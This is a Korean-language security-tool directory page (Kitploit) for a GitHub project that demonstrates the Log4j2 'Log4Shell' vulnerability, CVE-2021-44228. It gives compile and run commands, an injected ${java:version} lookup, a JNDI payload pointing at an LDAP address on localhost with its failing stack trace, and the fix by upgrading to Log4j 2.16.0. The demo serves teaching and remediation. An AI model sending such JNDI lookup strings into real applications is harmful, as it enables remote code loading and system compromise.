Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
log4j-vul — 이 프로젝트는 Apache Log4j2 취약점(일명 CVE-2021-44228)을 보여주기 위한 것입니다. | Kitploit
도구/GitHubGitHub/bhprin/log4j-vul
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubbhprin/log4j-vul

log4j-vul

이 프로젝트는 Apache Log4j2 취약점(일명 CVE-2021-44228)을 보여주기 위한 것입니다.

저장소 보기
23년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

log4j-vul

이 프로젝트는 Apache Log4j2 취약점(CVE-2021-44228)을 보여주기 위한 것입니다.

Java:

java version "1.8.0_121"

Compile:

(src 폴더에서) javac -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar com\example\Log4jVul.java

Execute\Run:

(src 폴더에서) java -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar com.example.Log4jVul Bhanu

Output: ERROR StatusLogger log4j2 설정 파일이 없습니다. 기본 설정을 사용합니다: 오류만 콘솔에 기록합니다. 11:29:08.081 [main] ERROR com.example.Log4jVul - ** 사용자명: Bhanu**

Vulnerability show:

(src 폴더에서) java -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar com.example.Log4jVul ${java:version}

Output: ERROR StatusLogger log4j2 설정 파일이 없습니다. 기본 설정을 사용합니다: 오류만 콘솔에 기록합니다. 11:34:04.110 [main] ERROR com.example.Log4jVul - ** 사용자명: Java version 1.8.0_121**

NOTICE: 출력은 "Java version 1.8.0_121"입니다 ********************

Vulnerability show (JNDI):

(src 폴더에서) java -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar -Dlog4j.configurationFile=log4j2.properties com.example.Log4jVul ${jndi:ldap://localhost:8181/Exploit}

참고: Java Unmarshaller Security에 대해 읽어보세요 - 데이터를 코드 실행으로 전환하기. https://github.com/mbechler/marshalsec

Output: 2021-12-22 10:04:25,803 WARN Error looking up JNDI resource [ldap://localhost:8181/Exploit]. javax.naming.ServiceUnavailableException: localhost:8181; socket closed at com.sun.jndi.ldap.Connection.readReply(Connection.java:454) at com.sun.jndi.ldap.LdapClient.ldapBind(LdapClient.java:365) at com.sun.jndi.ldap.LdapClient.authenticate(LdapClient.java:192) at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2788) at com.sun.jndi.ldap.LdapCtx.(LdapCtx.java:319) at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60) at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61) at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202) at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94) at javax.naming.InitialContext.lookup(InitialContext.java:417) at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:128) at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:55) at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:153) at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1041) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:957) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:847) at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:402) at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71) at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36) at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:197) at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:55) at org.apache.logging.log4j.core.layout.AbstractStringLayout.toByteArray(AbstractStringLayout.java:67) at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:108) at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99) at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:430) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:409) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367) at org.apache.logging.log4j.core.Logger.logMessage(Logger.java:112) at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:727) at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:716) at org.apache.logging.log4j.spi.AbstractLogger.error(AbstractLogger.java:344) at com.example.Log4jVul.main(Log4jVul.java:16)

10:04:25.779 [main] ERROR com.example.Log4jVul - ** 사용자명: ${jndi:ldap://localhost:8181/Exploit}**

Fixing with version Log4j 2.16.0

Compile:

(src 폴더에서) javac -classpath .;..\lib\log4j-api-2.16.0.jar;..\lib\log4j-core-2.16.0.jar com\example\Log4jVul.java

Execute\Run:

(src 폴더에서) java -classpath .;..\lib\log4j-api-2.16.0.jar;..\lib\log4j-core-2.16.0.jar com.example.Log4jVul ${java:version}

Output: 11:42:48.815 [main] ERROR com.example.Log4jVul - ** 사용자명: ${java:version}**

도구 다운로드